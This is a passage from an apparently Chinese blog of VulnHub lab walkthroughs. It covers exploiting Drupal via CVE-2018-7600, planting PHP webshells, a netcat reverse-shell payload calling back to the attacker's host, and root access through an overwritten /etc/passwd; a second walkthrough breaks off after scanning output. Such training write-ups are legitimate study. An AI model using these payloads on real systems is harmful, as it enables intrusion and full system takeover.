class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/etc/init.d/networking restart</span><br></pre></td></tr></table></figure><p>进行网卡重启</p><p>若是返回networking没找到此命令,证明ova导入时文件缺失,需要重新导入ova。</p><h2 id="进行渗透"><a href="#进行渗透" class="headerlink" title="进行渗透"></a>进行渗透</h2><p>靶机和kali在同一个网段。</p><p>使用nmap对此网段进行扫描</p><p>nmap 192.168.5.0/24 -O </p><p>其中靶机的信息如下 </p><p>Nmap scan report for 192.168.5.132<br>Host is up (0.00047s latency).<br>Not shown: 998 closed ports<br>PORT STATE SERVICE<br>22/tcp open ssh<br>80/tcp open http<br>MAC Address: 00:0C:29:B0:11:06 (VMware)<br>Device type: general purpose<br>Running: Linux 3.X|4.X<br>OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4<br>OS details: Linux 3.2 - 4.9<br>Network Distance: 1 hop</p><p>其中80端口开启了</p><p><strong>则这里靶机ip地址为192.168.5.132</strong></p><p>故存在网页,则使用dirsearch进行目录扫描</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628231946258.png" alt="image-20230628231946258"></p><p>发现<a href="http://192.168.5.132/drupal/%E5%B9%B6%E8%BF%9B%E8%A1%8C%E8%AE%BF%E9%97%AE">http://192.168.5.132/drupal/并进行访问</a></p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232004225.png" alt="image-20230628232004225"></p><p>通过 <a href="http://192.168.0.142/drupal/CHANGELOG.txt">http://192.168.0.142/drupal/CHANGELOG.txt</a> 得知grupal的版本为 Drupal 7.57</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232023925.png" alt="image-20230628232023925"></p><p>在百度等搜索引擎中搜索该版本的漏洞,找到CVE-2018-7600</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232037744.png" alt="image-20230628232037744"></p><p>在github中下载该漏洞的exp</p><p><a href="https://github.com/pimps/CVE-2018-7600">https://github.com/pimps/CVE-2018-7600</a></p><p>git clone <a href="https://github.com/pimps/CVE-2018-7600.git">https://github.com/pimps/CVE-2018-7600.git</a></p><p>在kali中</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">./drupa7-CVE-2018-7600.py http://192.168.5.132/drupal/ -c ls</span><br><span class="line"></span><br><span class="line">或者</span><br><span class="line">python3 drupa7-CVE-2018-7600.py http://192.168.5.132/drupal/ -c ls</span><br></pre></td></tr></table></figure><p>即可执行ls读取文件</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232052599.png" alt="image-20230628232052599"></p><p>在当前目录写一个一句话木马</p><p>这里参考的moonsec的</p><p>moon.php</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><?php system($_POST['moon']);?></span><br></pre></td></tr></table></figure><p>这里写自己的webshell</p><p>php.php</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><?php @eval($_POST['qwer']);?></span><br></pre></td></tr></table></figure><p>后者可以通过菜刀之类的webshell工具进行连接</p><p>这里用哥斯拉进行连接</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232108952.png" alt="image-20230628232108952"></p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232130003.png" alt="image-20230628232130003"></p><p>或者采用第一种(即moon的方式)进行反弹shell</p><p>然后在当前目录开启python自带的httpserver</p><p>python -m SimpleHTTPServer</p><p>然后使用</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./drupa7-CVE-2018-7600.py http://192.168.5.132/drupal/ -c "wget http://192.168.5.129:8000/moon.php" </span><br></pre></td></tr></table></figure><p>将php文件上传到靶机上</p><p>再使用</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./drupa7-CVE-2018-7600.py http://192.168.5.132/drupal/ -c ls</span><br></pre></td></tr></table></figure><p>查看php木马是否上传成功</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232146849.png" alt="image-20230628232146849"></p><p>首先在kali中使用nc进行监听</p><p>nc -lvnp 9000</p><p>在浏览器中访问<a href="http://192.168.5.132/drupal/moon.php">http://192.168.5.132/drupal/moon.php</a></p><p>使用burp进行抓包准备反弹shell</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">POST /drupal/moon.php HTTP/1.1</span><br><span class="line"></span><br><span class="line">Host: 192.168.5.132</span><br><span class="line"></span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4482.0 Safari/537.36 Edg/92.0.874.0</span><br><span class="line"></span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</span><br><span class="line"></span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line"></span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line"></span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line">Cookie: has_js=1</span><br><span class="line"></span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line"></span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line"></span><br><span class="line">Content-Length: 91</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">moon=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash++2>%261|nc+192.168.5.129+9000+>/tmp/f</span><br></pre></td></tr></table></figure><p>注意这里的 192.168.5.129为kali的ip地址</p><p>moon博客里写的是/bin/sh -i 但是我在测试时报错了</p><p>rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+‐i+2>%261|nc+192.168.0.136+9001+>/tmp/f</p><p>我这里改为 /bin/bash</p><p>moon=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash++2>%261|nc+192.168.5.129+9000+>/tmp/f</p><p>提交之后可以反弹一个shell</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232204943.png" alt="image-20230628232204943"></p><p>此时已经反弹成功</p><p>然后切换为python3的shell</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -c 'import pty;pty.spawn("/bin/bash")'</span><br></pre></td></tr></table></figure><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232226022.png" alt="image-20230628232226022"></p><p>在网站根目录发现一个<strong>alexander.txt</strong></p><p>使用cat获取其内容</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">www-data@hackNos:/var/www/html/drupal$ cd ..</span><br><span class="line">cd ..</span><br><span class="line">www-data@hackNos:/var/www/html$ ls</span><br><span class="line">ls</span><br><span class="line">alexander.txt drupal index.html</span><br><span class="line">www-data@hackNos:/var/www/html$ cat alexander.txt</span><br><span class="line">cat alexander.txt</span><br><span class="line">KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>凭借经验看出这是base64加密的数据,将其使用base64解密</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232243956.png" alt="image-20230628232243956"></p><p>然后发现左边是Brainfuck</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232301143.png" alt="image-20230628232301143"></p><p>解密网站如下</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://www.splitbrain.org/services/ook</span><br></pre></td></tr></table></figure><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232314924.png" alt="image-20230628232314924"></p><p>点击右下角Brainfuck to text即可解密</p><p>得到james:hacker@4514</p><p>通过查找,在home中找到james和其目录下的user.txt</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">www-data@hackNos:/home/james$ cat user.txt</span><br><span class="line">cat user.txt</span><br><span class="line"> _ </span><br><span class="line"> | | </span><br><span class="line"> / __) ______ _ _ ___ ___ _ __ </span><br><span class="line"> \__ \|______|| | | |/ __| / _ \| '__|</span><br><span class="line"> ( / | |_| |\__ \| __/| | </span><br><span class="line"> |_| \__,_||___/ \___||_| </span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>试着提权,先看看suid提权,需要搜索到,带有s的文件,开始查找。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -perm -u=s -type f 2>/dev/null</span><br></pre></td></tr></table></figure><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232332862.png" alt="image-20230628232332862"></p><p>发现wget普通用户也可执行</p><p>那么提权的方式就是通过下载目标靶机上的passwd,然后构造一个有root权限的用户加入到构造的passwd文件中,然后使用wget -O将内容重定向输入到/etc/passwd中</p><p>首先通过cat /etc/passwd获取靶机密码</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">www-data@hackNos:/var/www/html/drupal$ cat /etc/passwd</span><br><span class="line">cat /etc/passwd</span><br><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span><br><span class="line">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span><br><span class="line">sys:x:3:3:sys:/dev:/usr/sbin/nologin</span><br><span class="line">sync:x:4:65534:sync:/bin:/bin/sync</span><br><span class="line">games:x:5:60:games:/usr/games:/usr/sbin/nologin</span><br><span class="line">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</span><br><span class="line">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</span><br><span class="line">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</span><br><span class="line">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</span><br><span class="line">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</span><br><span class="line">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</span><br><span class="line">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</span><br><span class="line">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</span><br><span class="line">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</span><br><span class="line">irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin</span><br><span class="line">gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</span><br><span class="line">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</span><br><span class="line">systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false</span><br><span class="line">systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false</span><br><span class="line">systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false</span><br><span class="line">systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false</span><br><span class="line">syslog:x:104:108::/home/syslog:/bin/false</span><br><span class="line">_apt:x:105:65534::/nonexistent:/bin/false</span><br><span class="line">lxd:x:106:65534::/var/lib/lxd/:/bin/false</span><br><span class="line">messagebus:x:107:111::/var/run/dbus:/bin/false</span><br><span class="line">uuidd:x:108:112::/run/uuidd:/bin/false</span><br><span class="line">dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false</span><br><span class="line">james:x:1000:1000:james,,,:/home/james:/bin/bash</span><br><span class="line">sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin</span><br><span class="line">mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false</span><br><span class="line">moon:$1$moon$8F2YI9c3zhkkS9SOsKawY0:0:0:root:/root:/bin/bash</span><br></pre></td></tr></table></figure><p>复制到本地生成文件passwd</p><p>在kali中生成密码</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232349133.png" alt="image-20230628232349133"></p><p>将moon加入到伪造的passwd,并赋予root权限</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232408828.png" alt="image-20230628232408828"></p><p>将passwd放到开启了python httpserver的文件夹中</p><p>然后使用</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./drupa7-CVE-2018-7600.py http://192.168.5.132/drupal/ -c "wget http://192.168.5.129:8000/passwd -O /etc/passwd" </span><br></pre></td></tr></table></figure><p>或者直接在已有的shell中进行</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget http://192.168.5.129:8000/passwd -O /etc/passwd</span><br></pre></td></tr></table></figure><p>然后在已有的shell中进行切换用户</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232454442.png" alt="image-20230628232454442"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">root@hackNos:/var/www# cd ~</span><br><span class="line">cd ~</span><br><span class="line">root@hackNos:~# ls</span><br><span class="line">ls</span><br><span class="line">root.txt</span><br><span class="line">root@hackNos:~# cat root.txt</span><br><span class="line">cat root.txt</span><br><span class="line"> _ _ _ </span><br><span class="line"> _| || |_ | | </span><br><span class="line"> |_ __ _|______ _ __ ___ ___ | |_ </span><br><span class="line"> _| || |_|______|| '__|/ _ \ / _ \ | __|</span><br><span class="line"> |_ __ _| | | | (_) || (_) || |_ </span><br><span class="line"> |_||_| |_| \___/ \___/ \__|</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b</span><br><span class="line"></span><br><span class="line">Author : Rahul Gehlaut</span><br><span class="line"></span><br><span class="line">Linkedin : https://www.linkedin.com/in/rahulgehlaut/</span><br><span class="line"></span><br><span class="line">Blog : www.hackNos.com</span><br><span class="line"></span><br></pre></td></tr></table></figure><h2 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h2><p>使用菜刀等webshell不能切换,因为su命令必须在终端中执行</p><p>su: must be run from a terminal</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232523339.png" alt="image-20230628232523339"></p>]]></content>
<categories>
<category> Vulnhub </category>
</categories>
<tags>
<tag> 渗透测试 </tag>
<tag> 提权 </tag>
<tag> Linux </tag>
</tags>
</entry>
<entry>
<title>trollcave-v1-2</title>
<link href="/2023/10/21/trollcave-v1-2/"/>
<url>/2023/10/21/trollcave-v1-2/</url>
<content type="html"><![CDATA[<h1 id="trollcave-v1-2"><a href="#trollcave-v1-2" class="headerlink" title="trollcave-v1-2"></a>trollcave-v1-2</h1><p>靶机地址<a href="https://www.vulnhub.com/entry/trollcave-12,230/">Trollcave: 1.2 ~ VulnHub</a></p><p>目标为 root用户的<strong>flag.txt</strong></p><h2 id="靶机配置"><a href="#靶机配置" class="headerlink" title="靶机配置"></a>靶机配置</h2><p>靶机网卡配置参考我之前的<a href="https://blog.csdn.net/witwitwiter/article/details/119889384?spm=1001.2014.3001.5501">Os-hackNos-1_witwitwiter的博客-CSDN博客</a></p><h2 id="渗透测试"><a href="#渗透测试" class="headerlink" title="渗透测试"></a>渗透测试</h2><p>使用nmap进行端口扫描</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">└─# nmap -sV 192.168.5.136 </span><br><span class="line">Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-30 09:22 CST</span><br><span class="line">Nmap scan report for 192.168.5.136 (192.168.5.136)</span><br><span class="line">Host is up (0.00029s latency).</span><br><span class="line">Not shown: 998 filtered ports</span><br><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">80/tcp open http nginx 1.10.3 (Ubuntu)</span><br><span class="line">MAC Address: 00:0C:29:92:E4:A8 (VMware)</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 12.08 seconds</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>发现80端口</p><p>然后接着使用<code>drisearch</code>进行目录扫描</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><span class="line">└─# dirsearch -u "http://192.168.5.136/"</span><br><span class="line"></span><br><span class="line"> _|. _ _ _ _ _ _|_ v0.4.1</span><br><span class="line"> (_||| _) (/_(_|| (_| )</span><br><span class="line"></span><br><span class="line">Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10877</span><br><span class="line"></span><br><span class="line">Output File: /root/.dirsearch/reports/192.168.5.136/_21-09-02_21-14-34.txt</span><br><span class="line"></span><br><span class="line">Error Log: /root/.dirsearch/logs/errors-21-09-02_21-14-34.log</span><br><span class="line"></span><br><span class="line">Target: http://192.168.5.136/</span><br><span class="line"></span><br><span class="line">[21:14:34] Starting: </span><br><span class="line">[21:14:38] 200 - 2KB - /404 </span><br><span class="line">[21:14:38] 200 - 2KB - /404.html </span><br><span class="line">[21:14:38] 200 - 1KB - /500 </span><br><span class="line">[21:14:42] 302 - 92B - /admin -> http://192.168.5.136/login </span><br><span class="line">[21:14:42] 302 - 92B - /admin.aspx -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.jsp -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.conf -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.cgi -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.php -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.js -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.asp -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.cfm -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.dll -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.dat -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.html -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.htm -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.exe -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.ex -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.do -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.old -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.epc -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.mdb -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.passwd -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.py -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.php3 -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.pl -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.mvc -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.woa -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.rb -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin/ -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.shtml -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin/?/login -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.srf -> http://192.168.5.136/login</span><br><span class="line">[21:14:49] 302 - 92B - /comments -> http://192.168.5.136/login </span><br><span class="line">[21:14:51] 200 - 0B - /favicon.ico </span><br><span class="line">[21:14:55] 200 - 2KB - /login.jsp </span><br><span class="line">[21:14:55] 200 - 2KB - /login.php</span><br><span class="line">[21:14:55] 200 - 2KB - /login.aspx</span><br><span class="line">[21:14:55] 200 - 2KB - /login</span><br><span class="line">[21:14:55] 200 - 2KB - /login.asp</span><br><span class="line">[21:14:55] 200 - 2KB - /login.html</span><br><span class="line">[21:14:55] 200 - 2KB - /login.cgi</span><br><span class="line">[21:14:55] 200 - 2KB - /login.pl</span><br><span class="line">[21:14:55] 200 - 707B - /login.js</span><br><span class="line">[21:14:55] 500 - 48B - /login.json</span><br><span class="line">[21:14:55] 200 - 2KB - /login.py</span><br><span class="line">[21:14:55] 200 - 2KB - /login.rb</span><br><span class="line">[21:14:55] 200 - 2KB - /login.htm </span><br><span class="line">[21:14:55] 200 - 2KB - /login.shtml </span><br><span class="line">[21:14:55] 200 - 2KB - /login.srf </span><br><span class="line">[21:14:55] 200 - 2KB - /login.wdm%20 </span><br><span class="line">[21:14:55] 200 - 2KB - /login/ </span><br><span class="line">[21:14:59] 302 - 87B - /register.html -> http://192.168.5.136/ </span><br><span class="line">[21:14:59] 302 - 87B - /register.jsp -> http://192.168.5.136/</span><br><span class="line">[21:14:59] 302 - 87B - /register -> http://192.168.5.136/</span><br><span class="line">[21:14:59] 302 - 87B - /register.js -> http://192.168.5.136/ </span><br><span class="line">[21:14:59] 302 - 87B - /register.aspx -> http://192.168.5.136/</span><br><span class="line">[21:14:59] 302 - 87B - /register.php -> http://192.168.5.136/</span><br><span class="line">[21:14:59] 302 - 92B - /reports -> http://192.168.5.136/login </span><br><span class="line">[21:14:59] 200 - 202B - /robots.txt </span><br><span class="line">[21:15:02] 302 - 92B - /users.js -> http://192.168.5.136/login </span><br><span class="line">[21:15:03] 302 - 92B - /users.csv -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.html -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.aspx -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.php -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.ini -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.jsp -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.mdb -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.json -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.db -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.sqlite -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.sql -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.pwd -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.log -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.xls -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users/ -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.txt -> http://192.168.5.136/login</span><br><span class="line"> </span><br><span class="line">Task Completed</span><br></pre></td></tr></table></figure><p>可以看到有php环境和jsp环境,那么尝试访问login</p><p><img src="/2023/10/21/trollcave-v1-2/image-20230628231357999.png" alt="image-20230628231357999"></p><p>一个登陆界面,旁边发现了最新的用户,以及在线用户,点击用户可以发现URL中最后多了一个数字,点击几次后,发现最新的用户是17,那么可以遍历1~17,得到所有用户的信息</p><p><img src="/2023/10/21/trollcave-v1-2/image-20230628231421655.png" alt="image-20230628231421655"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 